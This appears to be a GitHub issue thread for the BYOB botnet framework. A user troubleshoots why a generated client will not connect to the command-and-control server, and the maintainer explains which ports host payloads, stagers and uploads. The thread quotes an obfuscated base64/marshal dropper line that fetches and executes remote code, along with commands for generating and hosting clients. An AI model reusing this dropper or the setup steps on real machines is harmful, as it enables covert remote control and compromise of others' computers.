### ISSUE TITLE
Client issue

### ISSUE THREAD

**Issue by hexan86** [malwaredllc/byob#60]
Raspberry PI 2B - Linux kali 4.1.12-v7 #87 SMP PREEMPT Tue Jan 5 20:59:45 CST 2016 armv7l GNU/Linux

`# python ./client.py --name byob02cl 192.168.1.8 **8186**

[>] Modules
        Adding modules... - (3 modules added to client)

[>]Imports
        Adding imports...- (26 imports from 3 modules)

[>] Payload
        Uploading payload...  (hosting payload at: http://192.168.1.8:**8187**//payloads/w4t.py)
[>] Stager
        Uploading stager... -(hosting stager at: http://192.168.1.8:**8187**//stagers/w4t.py)

[>] Dropper
        Writing dropper...  (203 bytes written to byob02cl.py)`

`# python ./server.py --host 192.168.1.8 --port **8187**`

Windows 7 - 32bit Intel CPU dual core 2140@1.60GHz 1.60GHz

CMD - Tried with and without admin rights. Same result.

`>
>python byob02cl.py
  	  
`
Nothing happens in both, Client seem to be stuck and from server-side there are no clients. But when I shut down the server, the client responds like this:

System32 CMD:
`>python byob02cl.py
Traceback (most recent call last):
  File "byob02cl.py", line 1, in <module>
    import zlib,base64,marshal,urllib,json;exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrdmBgYCgtysnJTNIDUvkFqXka6hklJQVW+vqGlkZ6hmYWeoZ6FlYWhhbm+vrFJYnpqUXF+uUmJXoFleqaekWpiSkamgDPlRR/')))))
TypeError: expected string without null bytes
>`

CMD: 
`>python byob02cl.py
Traceback (most recent call last):
  File "byob02cl.py", line 1, in <module>
    import zlib,base64,marshal,urllib,json;exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrdmBgYCgtysnJTNIDUvkFqXka6hklJQVW+vqGlkZ6hmYWeoZ6FlYWhhbm+vrFJYnpqUXF+uUmJXoFleqaekWpiSkamgDPlRR/')))))
  File "<string>", line 1, in <module>
  File "C:\Python27\lib\urllib.py", line 87, in urlopen
    return opener.open(url)
  File "C:\Python27\lib\urllib.py", line 213, in open
    return getattr(self, name)(url)
  File "C:\Python27\lib\urllib.py", line 351, in open_http
    errcode, errmsg, headers = h.getreply()
  File "C:\Python27\lib\httplib.py", line 1196, in getreply
    response = self._conn.getresponse()
  File "C:\Python27\lib\httplib.py", line 1121, in getresponse
    response.begin()
  File "C:\Python27\lib\httplib.py", line 438, in begin
    version, status, reason = self._read_status()
  File "C:\Python27\lib\httplib.py", line 394, in _read_status
    line = self.fp.readline(_MAXLINE + 1)
  File "C:\Python27\lib\socket.py", line 480, in readline
    data = self._sock.recv(self._rbufsize)
IOError: [Errno socket error] [Errno 10054]  Connection interrupted by the remote host
>`

So, it's clear that the client can see the server, but the server is not listing any client.

Only one time, in the server, appeared this: `[-] Failed Connection: 192.168.1.5`
It happens when the Server is still running and I close the CMD window.

And another issue is this:
`Quitting server - Keep clients alive? (y/n):y
Killed`

I really like this project, so I'm trying to give you all the info and make it better! :)

**Comment by hexan86** [comment]
The server is still active.... sort of...
`root     25679  0.0  0.8  10712  8496 pts/0    S    06:40   0:00 /usr/bin/python -m SimpleHTTPServer 8189
root     25681  0.0  0.8  10712  8532 pts/0    S    06:40   0:00 /usr/bin/python -m SimpleHTTPServer 8188
root     25683  0.0  0.7   9680  7528 pts/0    S    06:40   0:00 /usr/bin/python core/handler.py 8190
root     25715  0.0  0.2   4764  2012 pts/0    R+   06:52   0:00 ps -aux`

**Comment by hexan86** [comment]
`python ./server.py --host 192.168.1.8 --port 8187 --database new.db --debug

[?]  Hint: show usage information with the 'help' command

parent=main , child=run , args={'self': <__main__.C2 instance at 0x766e1468>}
>clients
parent=run , child=session_list , args={'self': <__main__.C2 instance at 0x766e1468>, 'verbose': True}


>exit
Quitting server - Keep clients alive? (y/n):y
Killed
`

**Comment by hexan86** [comment]
![immagine](https://user-images.githubusercontent.com/25898674/47144210-41db0e00-d2c7-11e8-8cb4-6d0806f9fef9.png)

**Comment by hexan86** [comment]
Ok, I think I've figured out why isn't working. On my raspberry there are different versions of python.
I used "python2 ./server --port 127.0.0.1" and "python2 client.py" and now (this kind of connection) is working. Hope this is useful to you :)

**Comment by malwaredllc** [comment]
It looks like you're generating a client that connects to port 8186, but running the server on port 8187.

If you generate a client using port 8186 (`python client.py 192.168.1.8 8186`), you must run the server on port 8186 (`python server.py --port 8186`).

`server.py` runs on 4 ports:
1. Command & control server will run on port 8186.
2. Payloads, stagers, and modules will be hosted on 8187 (port + 1).
3. Packages/dependencies will be hosted on 8188 (port + 2).
4. HTTP POST request handler for file uploads from clients will run on 8189 (port + 3).

I hope this helps - let me know if you have any other questions.

**Comment by hexan86** [comment]
As you can see, I give the command for the port 8186, but the client output says 8187. If I try to start the server listening at 8186 it doesn't work, if I put 8187 then it connects.
Later I can try again.

**Comment by hexan86** [comment]
I can confirm to you the following situation:

`python2 ./client --name /var/www/html/Client_byob/new_lan_test.py192.168.1.8 8186

[>] Modules
        Adding modules... -(3 modules added to client)

[>] Imports
        Adding imports...-(26 imports from 3 modules)

[>] Payload
        Uploading payload...  (hosting payload at: http://192.168.1.8:8187//payloads/rvn.py)

[>] Stager
        Uploading stager... - (hosting stager at: http://192.168.1.8:8187//stagers/rvn.py)

[> Dropper
        Writing dropper...  (203 bytes written to /var/www/html/Client_byob/new_lan_test.py)


python2 ./server.py --host 192.168.1.8 --port 8186
`
The server is running, I launch the client in windows (python new_lan_test.py)  and nothing happens, it returns to the command line, as a successful command, with no output, but no connection. If I exit from the server, some processes remain active.

If I launch the server with port 8187 and the client from windows, the command line remains blocked, there is no connection and if I exit from the server the client dies, coming back to a functioning command line.
`Traceback (most recent call last):
  File "new_lan_test.py", line 1, in <module>
    import zlib,base64,marshal,urllib,json;exec(eval(marshal.loads(zlib.decompre
ss(base64.b64decode('eJwrdmBgYCgtysnJTNIDUvkFqXka6hklJQVW+vqGlkZ6hmYWeoZ6FlYWhhb
m+vrFJYnpqUXF+kVleXoFleqaekWpiSkamgDSmBS2')))))
  File "<string>", line 1
    ┴Ü@Ö╔bGı´è╬♫♣─æY7╩ú³_bW¶§>▓¿ÑçØ:=╬³┘&3i»¶U-w/Âh:£z¡?i┘§┌»%s▬L¿G{Öç£a┤º»Íø¤î¶
¨Ì$↕ü\®¦tK7~♀AÎ"þ»1åÛ¤© }
    ^
SyntaxError: invalid syntax
`

I don't want to bother you, I'm trying to make it work on my devices

**Comment by malwaredllc** [comment]
> As you can see, I give the command for the port 8186, but the client output says 8187

It is just letting you know that the payload and stager are being hosted on port 8187 - the client will still connect to port 8186 when executed.

> python2 ./server.py --host 192.168.1.8 --port 8186

Try not using the `--host` argument when running `server.py` (or setting it to `0.0.0.0`).

**Comment by malwaredllc** [comment]
The client has to be generated on the same machine as the server, so that the payload + stager can be hosted by the server.

**Comment by hexan86** [comment]
I created the client in the same machine, but after that, I moved it in the Windows machine to test it.

**Comment by AraFurieux** [comment]
you have forgit the database no ?

**Comment by AraFurieux** [comment]
when i don't use the database ... i have the same resltut that you

**Comment by AraFurieux** [comment]
;)

**Comment by hexan86** [comment]
Nope :( 
My steps were:
Removed all and restart with a new byob download.

**In the Raspberry**
`python ./setup.py`
Started the Server on 192.168.1.8 at 8886 with: 
`python ./server.py --database DB.db --port 8886 `
On the same machine, another terminal, I've created the Client, with the same port: 
`python ./client.py --name newClient.py 192.168.1.8 8886` 
and
`mv newClient.py /var/www/html/Client_byob/; service apache2 start`

**In the Windows machine**
Downloaded the client from 192.168.1.8/Client_byob/
Then, in CMD `python newClient.py` 

**The result**:

![fail01](https://user-images.githubusercontent.com/25898674/47251850-7a4f2900-d43a-11e8-9376-89bc7eaf7461.png)

Also with commands "clients" and "sessions", the server isn't showing anything.

**Comment by malwaredllc** [comment]
If you use apache2 web server to host the client so you can download it on your other machine, you need to remember to stop the apache2 service before starting the BYOB server.

I'm not 100% sure why, but in my experience if apache2 is running it seems to interfere with the BYOB server.

**Comment by hexan86** [comment]
Not working either. If you want close this issue. Maybe is something else, something in my system that is interfering and not a problem in your code. it's really probable, because I use this PC for heavy testing: BotNets, PenTesting, SpyWare, BackDoors, ... and after a while it doesn't work really well.
Periodically I format both, Raspberry and PC. Maybe, after a fresh OS install, I'll retry.

**Comment by malwaredllc** [comment]
This project has never been tested on a Raspberry Pi, but has been successfully tested on Windows, Linux, and macOS.

I can't replicate this issue on Windows, Linux, or macOS, so I'm going to close it.

Feel free to let me know if you have any other issues!
